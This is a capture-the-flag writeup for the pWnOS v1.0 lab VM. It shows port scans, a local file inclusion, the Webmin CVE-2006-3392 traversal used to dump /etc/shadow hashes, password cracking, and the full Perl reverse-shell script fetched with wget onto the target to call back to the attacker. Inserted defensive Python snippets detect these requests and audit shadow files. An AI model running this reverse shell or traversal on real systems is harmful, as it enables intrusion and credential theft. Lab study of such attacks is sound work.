
Author: u$3r_h0n3$t
# pWnOs WriteUps 2023
---
**Steps for Setting up the VM**
Download pwnOS from this link:
https://download.vulnhub.com/pwnos/pWnOS_v1.0.zip
1 - Unzip the archive, move the folder to the C: drive and launch the VM.
If VMware asks on first boot whether you copied or moved this virtual machine, click **MOVED!** This will not mess up your network settings.
Then shut it down, go to the VM settings, set the network adapter to NAT and launch it again.
Launch your attack machine.
---
# Information Gathering
## Finding the IP
For this I use **netdiscover**:
```shell=
netdiscover -i eth0 -f
```

## Enumerating ports
I run an nmap scan:
```shell=
nmap -sT -Pn -n -vv 192.168.136.140 -p- -sC --script=vuln
```
I get a lot of info here:
```shell=
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-trace: TRACE is enabled
| Headers:
| Date: Mon, 13 Nov 2023 14:23:11 GMT
| Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
| Connection: close
| Transfer-Encoding: chunked
|_Content-Type: message/http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
| /index/: Potentially interesting folder
|_ /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
10000/tcp open snet-sensor-mgmt syn-ack
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_ http://www.exploit-db.com/exploits/1997/
Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
```
## Directory Enumeration with Gobuster
```shell=
gobuster dir -u http://192.168.136.140:80 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.136.140:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 310]
/.htpasswd (Status: 403) [Size: 310]
/cgi-bin/ (Status: 403) [Size: 309]
/index (Status: 200) [Size: 295]
/index1 (Status: 200) [Size: 1104]
/index2 (Status: 200) [Size: 156]
/php (Status: 301) [Size: 334] [--> http://192.168.136.140/php/]
/server-status (Status: 403) [Size: 314]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
```
To make sure I get all the info I need, I also run a Nikto scan:
```shell=
nikto -h http://192.168.136.140
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.136.140
+ Target Hostname: 192.168.136.140
+ Target Port: 80
+ Start Time: 2023-11-13 11:29:25 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
+ /: Retrieved x-powered-by header: PHP/5.2.3-1ubuntu6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.2.4 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.3-1ubuntu6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /php/: Directory indexing found.
+ /php/: This might be interesting.
+ /icons/: Directory indexing found.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 294754, size: 4872, mtime: Thu Jun 24 14:46:08 2010. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /index1.php: PHP include error may indicate local or remote file inclusion is possible.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time: 2023-11-13 11:29:54 (GMT-6) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
---
# Method A
# File inclusion and getting the hashes

The URL suggests that there might be a security vulnerability known as "Local File Inclusion" (LFI).
If we pass /etc/passwd in the connect parameter:

**Base URL and script:** http://192.168.136.140/index1.php
This part indicates that a request is being made to a PHP script (index1.php) hosted on the server with the IP address 192.168.136.140.
**Query parameters:** ?help=true&connect=/etc/passwd
?: this character marks the beginning of the query string in a URL.
help=true: a key-value pair in the query string.
&: this character separates multiple parameters in a query string.
connect=/etc/passwd: another key-value pair. The connect parameter is being passed the path /etc/passwd.
**Local File Inclusion (LFI):**
/etc/passwd: a standard file on Unix and Linux systems that contains user account information. It is often targeted in LFI attacks because it reveals usernames and other potentially sensitive data about the system's users.

The hashes will not be found here; there are other ways of getting them.
---
# Technique 1 -> Metasploit on Webmin
Earlier, in the port enumeration, we found this:
```shell=
10000/tcp open snet-sensor-mgmt syn-ack
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_ http://www.exploit-db.com/exploits/1997/
```
**Using Metasploit**
We want to get the password hashes of the users we found:
```cmd=
msf6 > search webmin
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
msf6 > use auxiliary/admin/webmin/file_disclosure
msf6 auxiliary(admin/webmin/file_disclosure) > set RHOSTS 192.168.136.140
RHOSTS => 192.168.136.140
msf6 auxiliary(admin/webmin/file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf6 auxiliary(admin/webmin/file_disclosure) > run
[*] Running module against 192.168.136.140
[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed
```
There we have the hashes.
Short explanation: on Linux, users are listed in /etc/passwd, and their password hashes are stored in /etc/shadow, which can only be read by root.
So why can we read it when we are not root? Webmin runs as root, and the file disclosure bug serves any file Webmin itself can read, without requiring authentication.
For more info see **CVE-2006-3392**.
# Technique 2 -> Manual exposure
After searching the web I found that a known vulnerability in Webmin/Usermin can be exploited to read files from the server without requiring authentication, hence the significance of the 'unauthenticated' path in this context.
There is a script found here: https://www.exploit-db.com/exploits/2017
It is a Perl exploit script for a specific vulnerability in Webmin and Usermin versions prior to 1.290 and 1.220, respectively. The script demonstrates how the vulnerability can be exploited to perform arbitrary file disclosure.
Exploit mechanism:
It constructs a URL with the /unauthenticated/ path and appends a series of ..%01 sequences. This is the directory traversal technique used to move up in the directory hierarchy and bypass the removal of "../" sequences.
It then appends the desired filename to this path, aiming to read that file.
So we can inject the payload manually in the URL:


These are the same hashes we got with the previous technique.
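As an added example (not part of the original writeup), here is the detection side of the two unauthenticated file reads described above: a small Python scanner that flags, in Apache-style access log lines, the index1.php connect= include from the LFI section and the Webmin /unauthenticated/..%01 traversal from this section. The log lines, the INCLUDE_PARAMS list and the label names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format); not captured from the real target.
SAMPLE_LOG = """\
192.168.136.129 - - [13/Nov/2023:14:23:11 +0000] "GET /index1.php?help=true&connect=/etc/passwd HTTP/1.1" 200 1104 "-" "Mozilla/5.0"
192.168.136.129 - - [13/Nov/2023:14:23:12 +0000] "GET /index1.php?help=true&connect=../../../../etc/passwd HTTP/1.1" 200 1104 "-" "Mozilla/5.0"
192.168.136.129 - - [13/Nov/2023:14:23:13 +0000] "GET /unauthenticated/..%01/..%01/..%01/..%01/etc/shadow HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
192.168.136.129 - - [13/Nov/2023:14:23:14 +0000] "GET /index1.php?help=true&connect=about HTTP/1.1" 200 295 "-" "Mozilla/5.0"
192.168.136.129 - - [13/Nov/2023:14:23:15 +0000] "GET /php/ HTTP/1.1" 200 334 "-" "gobuster/3.6"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Query parameters that index1.php feeds into an include; assumption based on the
# connect= parameter seen in the writeup, extend it for other applications.
INCLUDE_PARAMS = {"connect"}
# "../" plus the encoded forms that survive naive "../" stripping (..%01 is the Webmin case).
TRAVERSAL_RE = re.compile(r"\.\.(/|%2f|%01|%00)", re.IGNORECASE)


def classify_request(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    # Webmin CVE-2006-3392: the /unauthenticated/ handler plus traversal sequences.
    if parts.path.lower().startswith("/unauthenticated/"):
        if TRAVERSAL_RE.search(parts.path) or "../" in unquote(parts.path):
            return "webmin-traversal"
    # LFI/RFI: an include parameter carrying an absolute path, a traversal or a URL.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in INCLUDE_PARAMS:
            continue
        for value in values:
            if value.startswith("/") or "://" in value or TRAVERSAL_RE.search(value):
                return "lfi-include"
    return None


def scan_log(text):
    """Return (label, request target) for every suspicious request in an access log."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            label = classify_request(match.group("target"))
            if label:
                findings.append((label, match.group("target")))
    return findings
```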
# Cracking the hashes
These are the hashes:
```shell=
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
```
I put them all in one file named hashes.txt

John cracked one:
**h4ckm3 (vmware)**
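As an added example (not part of the original writeup), here is a small audit of the /etc/shadow format shown above from the defender's side: it parses each record, identifies the hash scheme from its prefix and lists the accounts whose password is cheap to attack offline. The $1$ prefix is md5crypt, a fast legacy scheme, which is why a wordlist run like the John attempt above finishes quickly. The sample input reuses the page's own shadow lines; the scheme table and the "weak" rule are assumptions of this example.

```python
from datetime import date, timedelta

# Sample input constructed from the shadow lines shown above.
SAMPLE_SHADOW = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
"""

# crypt(3) prefixes; $1$ (md5crypt) is the fast legacy scheme every account above uses.
HASH_SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                "$y$": "yescrypt", "$2b$": "bcrypt"}
LEGACY_SCHEMES = {"descrypt", "md5crypt"}


def parse_shadow_line(line):
    """Parse one /etc/shadow record: user, password status, hash scheme, last change date."""
    fields = line.split(":")
    if len(fields) != 9:
        raise ValueError("expected 9 colon-separated fields: %r" % line)
    user, pw, lastchg = fields[0], fields[1], fields[2]
    if pw == "":
        status = "empty"    # no password at all: login without one
    elif pw.startswith(("!", "*")):
        status = "locked"   # '!' locked by the admin, '*' never had a password
    else:
        status = "active"
    scheme = None
    if status == "active":
        scheme = next((n for p, n in HASH_SCHEMES.items() if pw.startswith(p)), None)
        if scheme is None:  # 13-character hashes without a $id$ prefix are traditional DES
            scheme = "descrypt" if len(pw) == 13 else "unknown"
    # Field 3 is the last password change, counted in days since 1970-01-01.
    last_change = date(1970, 1, 1) + timedelta(days=int(lastchg)) if lastchg else None
    return {"user": user, "status": status, "scheme": scheme, "last_change": last_change}


def audit_shadow(text):
    """Return users whose password is cheap to attack offline: empty or a legacy hash scheme."""
    weak = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_shadow_line(line)
        if rec["status"] == "empty" or rec["scheme"] in LEGACY_SCHEMES:
            weak.append(rec["user"])
    return weak
```

The last-change day counts (14041, 14042) decode to June 2008, which matches the "Last login" banner seen later when logging in over SSH.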
---
# Choose your rabbithole

# RabbitHole 1 -> The Shellshock way
We can try accessing SSH with the vmware user.
```shell=
ssh vmware@192.168.136.140
Unable to negotiate with 192.168.136.140 port 22:
no matching host key type found. Their offer: ssh-rsa,ssh-dss
:(
```
## Access SSH Server
I can temporarily allow this older host key type in my SSH client by specifying it on the command line. However, be aware that using older, less secure key types can expose you to certain security risks.
This command tells your SSH client to accept ssh-rsa host keys for this session:
```shell=
ssh -oHostKeyAlgorithms=+ssh-rsa vmware@192.168.136.140
vmware@192.168.136.140's password:
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008 -> ||| LOL, thats a long time ago
vmware@ubuntuvm:~$
```
We are inside the server now.
```shell=
vmware@ubuntuvm:~$ whoami
vmware
vmware@ubuntuvm:~$ id
uid=1000(vmware) gid=1000(vmware) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),111(lpadmin),112(admin),1000(vmware)
vmware@ubuntuvm:~$
```
But we are not root.
We know that Webmin is running as root.
## Create a webshell with Perl
First, I know that Kali ships a few webshells.
The reverse shell we are going to use is a Perl script.
It is located in /usr/share/webshells/perl.
I copy the script, place it in the folder I am working from, and rename it to **tmp_file.cgi**.
Inside the script we need to put our Kali address (found with ifconfig) and specify the port; I will use 443.
```perl=
#!/usr/bin/perl -w
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell. Change these.
my $ip = '192.168.136.129';
my $port = 443;

# Options
my $daemon = 1;
my $auth = 0;   # 0 means authentication is disabled and any
                # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicuous
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }
    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port, inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN,  ">&SOCK");
open(STDOUT, ">&SOCK");
open(STDERR, ">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n" . $global_page;
}
```
## Create an HTTP server with Python
With that ready, I open a new terminal window and start an HTTP server so the target can fetch the file from my machine.
```shell=
python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
From the SSH session on the target, I use wget with my Kali IP and the port the Python server is listening on.
## Wget the Perl reverse shell script onto the SSH server
```shell=
vmware@ubuntuvm:~$ wget http://192.168.136.129:8000/tmp_file.cgi
--11:33:10--  http://192.168.136.129:8000/tmp_file.cgi
           => `tmp_file.cgi'
Connecting to 192.168.136.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,717 (3.6K) [application/octet-stream]

100%[==========================================================>] 3,717  --.--K/s

11:33:11 (140.99 MB/s) - `tmp_file.cgi' saved [3717/3717]
vmware@ubuntuvm:~$ ls
tmp_file.cgi
```
This file needs to be executable, which we can do with:

Now I start a netcat listener on port 443:
```shell=
root@kali:~/Documents/CTF/pwnOs# nc -lvp 443
listening on [any] 443 ...
```
## Trigger the exploit
I go back to the browser and navigate to the URL of the CGI script on the server; requesting it triggers the script and with it the privilege escalation.


---
# Rabbithole 2 to be continued ------